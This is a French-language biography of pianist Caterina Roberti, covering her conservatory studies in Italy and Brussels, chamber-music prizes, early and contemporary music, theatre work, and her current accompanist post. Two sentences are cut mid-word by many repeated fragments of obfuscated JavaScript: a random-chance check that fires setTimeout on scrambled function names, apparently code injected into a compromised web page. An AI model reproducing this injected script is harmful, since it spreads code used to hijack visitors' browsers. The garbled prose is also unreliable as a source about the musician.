Caterina ROBERTI

Caterina ROBERTI, pianocaterina vignette

C’est au Conservatoire G.B. Pergolesi de Fermo (Italie) dans la classe de Enrico Belli que Caterina
obtient son Diplôme de piano avec la plus grandom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}ande distinction et félicitations du jury.
Au cours de ses études elle a la possibilité de se perfectionner avec des musiciens de renom tels que
A. Jasinski, A. Ballista, L. Berman, F. Ullen, A. Laganà, Cristina Ortiz, S. Fiuzzi, A. Dallapè, Tamara
Stefanovich, P. Masi.
Très active en qualité de chambriste, Caterina se produit régulièrement au sein de plusieurs
ensembles, s’adonnant tout particulièrement au répertoire pour violon et piano, alto et piano,
violoncelle et piano, contrebasse et piano, flûte et piano ou encore deux pianos, domaine musical dans
lequel elle se spécialise auprès de M. Durruoglu, P. Masi, E. Belli, Alessandom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andra Gentile, Luisa Prayer.
C’est en 2013 qu’elle obtient le diplôme de L’école Supérieure Internationale de Musique de Chambre
sous l’égide du Trio di Parma avec le violoniste Giacomo Coletti avec qui elle fonde le Bric-à-Brac duo,
lauréat du premier prix au prestigieux concours G. Rospigliosi de Pistoia (Italie) en 2010 et au concours
Mikrokosmi Off de Ravenna (Italie) en 2013.
Désirant approfondir ses connaissances dans le domaine de la musique ancienne, elle étudie non
seulement le clavecin dans la classe de A. Dallapé mais également le piano-forte à l’Académie
Internationale Incontri col Maestro d’Imola (Italie) auprès de S. Fiuzzi.
En Septembre 2013, Caterina est admise en Master Spécialisé en Piano d’Accompagnement au
Conservatoire Royal de Bruxelles dans la classe de P. Riga pour l’accompagnement et Eliane Reyes
pour le piano et elle obtient sont diplôme en mai 2015.
Passionnée par la musique contemporaine, elle a la possibilité à Bruxelles de rencontrer des musiciens
tels que W. Latchoumia, S. Ginsburgh, P. Terseleer ainsi que de participer, entre autres, à l’édition
2014 du Festival de musique contemporaine Ars Musica pour l’interprétation des pièces du
compositeur belge J.L. Fafchamps. En Avril 2015 elle reçoit le prix dʹhonneur pour lʹinterprétation de la
pièce Distances de Noël LEE au Concours-Festival au CRR de Paris.
L’amour des langues l’amène à s’inscrire en 2010 à l’École de Langues Modernes pour Interprètes et
Traducteurs de Forlì (Italie) et à terminer ses études en anglais et français à la Sorbonne Nouvelle à
Paris.
Pianiste s’épanouissant à travers de nombreux centres d’intérêts, elle associe sa passion pour la
musique à son amour pour le théâtre qu’elle cultive au sein du Teatrolaboratorio sous la direction de
D. Sobrini, écrivain, réalisateur et dramaturge italien avec qui elle collabore activement depuis 2009.
C’est ainsi qu’en 2013 elle est amenée à diriger le sous-titrage de son long-métrage Le troisième jour,
œuvre sélectionnée en 2013 pour participer au Marché du Film du Festival de Cannes.
Caterina occupe actuellement le poste d’accompagnatrice de danse au Conservatoire de Châlons-en-
Champagne et est inscrite en Master 2 de Piano au Conservatoire Royal de Bruxelles dans la classe de
Eliane Reyes.

TOP